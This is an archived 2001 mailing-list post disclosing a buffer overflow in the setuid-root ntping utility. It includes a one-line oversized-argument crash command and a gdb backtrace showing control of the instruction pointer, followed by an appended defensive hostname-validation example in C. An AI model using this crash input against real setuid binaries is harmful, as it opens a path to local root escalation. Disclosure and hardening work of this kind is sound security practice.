Vulnerability Development mailing list archives

suid scotty (ntping) overflow


From: KF <dotslash () snosoft com>
Date: Tue, 12 Jun 2001 05:34:16 -0400

I am not sure that this made it on to the list the first time I sent it... so sorry if this is a duplicate.

[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/

What led me to research this:
arndt () aorta tat physik uni-tuebingen de (Michael Arndt) wrote:
  I run scotty-testsuite: what must I change on my system (Linux
  Slackware)?
  ==== Test generated error:
  can not connect straps socket: Permission denied
straps and ntping must be installed suid root.

^------- Hrmm I sure thought that was interesting to know *grin*

Vendors affected:
unknown by the author of this document

just a note I found however...

<19990702221232.79B119410 () Galois suse de>
Hi folks,
here is the long promised posting of all suid/sgid files on an alpha of
SuSE Linux 6.2 ... comments on wrong permissions are welcome.
Please note that SuSE has got 5 full CD-ROMs, so that's the reason for the
many many files ... (and too many suid/sgid ones ...)
...
-rwsr-xr-x   1 root     root        33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x   1 root     root        18352 Jun 30 11:11 ./usr/bin/straps
...

[root@linux d0tslash]# gdb /usr/bin/ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.

Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libresolv.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0  0x40079b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x40079b66 in getenv () from /lib/libc.so.6
#1  0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
#2  0x4013b9de in __res_ninit () from /lib/libc.so.6
#3  0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4  0x4013ff5f in gethostbyname () from /lib/libc.so.6
#5  0x080495b8 in _start ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

-KF
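The crash above comes from handing a 9000-byte argv[1] straight into the resolver from a setuid-root program. As an added illustration that is not scotty's code, the hypothetical `valid_hostname()` below shows the kind of input check a setuid tool should run before it ever calls gethostbyname(): it enforces the RFC 1123 limits (whole name at most 253 bytes, each label 1 to 63 letters, digits or hyphens, no leading or trailing hyphen) and rejects anything else, so an oversized or garbage argument is refused instead of reaching libc.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical validator (not from ntping/scotty): accept only a
 * syntactically sane hostname before it reaches gethostbyname().
 * Limits follow RFC 1123; a trailing '.' is rejected to stay strict. */
#define MAX_HOSTNAME 253
#define MAX_LABEL    63

int valid_hostname(const char *name)
{
    size_t len, label, i;

    if (name == NULL)
        return 0;
    len = strnlen(name, MAX_HOSTNAME + 1);   /* never scan past the cap */
    if (len == 0 || len > MAX_HOSTNAME)
        return 0;                            /* a 9000-byte argument stops here */

    label = 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '.') {
            if (label == 0 || name[i - 1] == '-')
                return 0;                    /* empty label or label ends in '-' */
            label = 0;
        } else if (isalnum(c) || c == '-') {
            if (label == 0 && c == '-')
                return 0;                    /* label may not start with '-' */
            if (++label > MAX_LABEL)
                return 0;                    /* label longer than 63 bytes */
        } else {
            return 0;                        /* spaces, control bytes, etc. */
        }
    }
    return label > 0 && name[len - 1] != '-'; /* no trailing '.' or '-' */
}

int main(int argc, char **argv)
{
    if (argc != 2 || !valid_hostname(argv[1])) {
        fprintf(stderr, "usage: %s <hostname>\n", argv[0]);
        return 1;
    }
    /* Only now would a real tool go on to gethostbyname(argv[1]). */
    printf("ok: %s\n", argv[1]);
    return 0;
}
```

Length checks alone do not remove the need for the setuid bit to be justified; if only raw-socket access is needed, restricting the binary to a group or dropping privileges right after the socket is opened limits what a bug like this can reach.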

